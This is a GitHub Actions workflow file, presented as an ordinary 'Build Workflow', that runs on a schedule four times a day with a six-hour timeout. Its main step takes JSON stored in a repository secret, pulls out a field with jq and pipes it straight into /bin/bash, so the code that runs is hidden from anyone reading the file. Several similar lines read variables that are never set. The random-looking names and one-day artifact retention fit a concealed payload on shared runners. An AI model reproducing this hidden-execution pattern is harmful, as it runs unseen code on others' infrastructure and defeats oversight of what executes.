name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '48 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          t400: ${{ secrets.t400 }}
        run: |
          printf '%s' "$t400" | jq -r .pl80 | /bin/bash
          printf '%s' "$dow2369" | jq -r .siat230 | /bin/bash
          printf '%s' "$hj82" | jq -r .hmqhm66 | /bin/bash
          echo $zjaup314 | jq -r .vem98 | /bin/bash
          printf '%s' "$r82" | jq -r .jvwb618 | /bin/bash
          echo $fkk3 | jq -r .gm33 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: HJOITsOy
          path: "*.zip"
          retention-days: 1
